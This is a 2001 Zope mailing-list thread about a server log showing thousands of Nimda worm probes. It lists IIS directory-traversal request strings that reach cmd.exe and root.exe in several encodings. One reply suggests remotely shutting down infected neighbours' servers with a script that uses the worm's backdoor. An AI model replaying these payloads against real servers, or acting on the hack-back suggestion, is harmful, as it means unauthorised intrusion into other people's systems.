[Zope] Zope 1 : NIMDA 0

[BZ]

 From Z2.log and Analog (http://www.analog.cx)

BZ

At 2:08 PM -0700 9/20/01, Michael Montagne wrote:
>How do you get that log from Zope?
>
>
>On Thu, Sep 20, 2001 at 08:30:33PM +0000, Reinoud van Leeuwen wrote:
>>  On 20 Sep 2001 18:28:43 -0000, you wrote:
>>
>>  >Failure Report (9/19/2001 - 24 hour report)
>>  >Listing the top 30 files by the number of failed requests, sorted 
>>by the number of failed requests.
>>  >
>>  >reqs: file
>>  >----: ----
>>  >1210: /scripts/..%255c../winnt/system32/cmd.exe
>>  >1210:   /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
>>  >1204: /scripts/..%5c../winnt/system32/cmd.exe
>>  >1204:   /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
>>  > 615: /scripts/root.exe
>>  > 615:   /scripts/root.exe?/c+dir
>>  > 611: /MSADC/root.exe
>>  > 611:   /MSADC/root.exe?/c+dir
>>  > 610: /c/winnt/system32/cmd.exe
>>  > 610:   /c/winnt/system32/cmd.exe?/c+dir
>>  > 609: /d/winnt/system32/cmd.exe
>>  > 609:   /d/winnt/system32/cmd.exe?/c+dir
>>  > 608: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
>>  > 608: 
>>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>>  > 606: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
>>  > 606: 
>>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>>  > 604: /scripts/..%c1%1c../winnt/system32/cmd.exe
>>  > 604:   /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
>>  > 604: 
>>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe
>>  > 604: 
>>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>>  > 603: /scripts/..%c0%af../winnt/system32/cmd.exe
>>  > 603:   /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
>>  > 603: /scripts/winnt/system32/cmd.exe
>>  > 603:   /scripts/winnt/system32/cmd.exe?/c+dir
>>  > 602: /scripts/..%c1%9c../winnt/system32/cmd.exe
>>  > 602:   /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
>>  > 598: /scripts/..%252f../winnt/system32/cmd.exe
>>  > 598:   /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
>>  >
>>  >That is a lot of requests! Glad Zope could handle it.
>>  >
>>
>>  You can "help" your infected neigbours by remotely turning their
>>  infected servers off! see
>>  http://pc.xs4all.nl/default.ida
>>
>>  (it is a Perl script that uses the same backdoor as the virus itself.
>>  I've not yet installed perl in Zope, but am working on it ";-)
>>
>>  --
>>  __________________________________________________
>>  "Nothing is as subjective as reality"
>>  Reinoud van Leeuwen       reinoud@xs4all.nl
>>  http://www.xs4all.nl/~reinoud
>>  -> when replying to a mailinglist mail, please do  <-
>>  -> *NOT* cc: me as well. If I read the list I will <-
>>  -> receive the reply as well!                      <-
>>  __________________________________________________
>>
>>  _______________________________________________
>>  Zope maillist  -  Zope@zope.org
>>  http://lists.zope.org/mailman/listinfo/zope
>>  **   No cross posts or HTML encoding!  **
>>  (Related lists -
>>   http://lists.zope.org/mailman/listinfo/zope-announce
>>   http://lists.zope.org/mailman/listinfo/zope-dev )
>
>--
>Michael Montagne
>montagne@boora.com
>http://www.boora.com
>
>_______________________________________________
>Zope maillist  -  Zope@zope.org
>http://lists.zope.org/mailman/listinfo/zope
>**   No cross posts or HTML encoding!  **
>(Related lists -
>  http://lists.zope.org/mailman/listinfo/zope-announce
>  http://lists.zope.org/mailman/listinfo/zope-dev )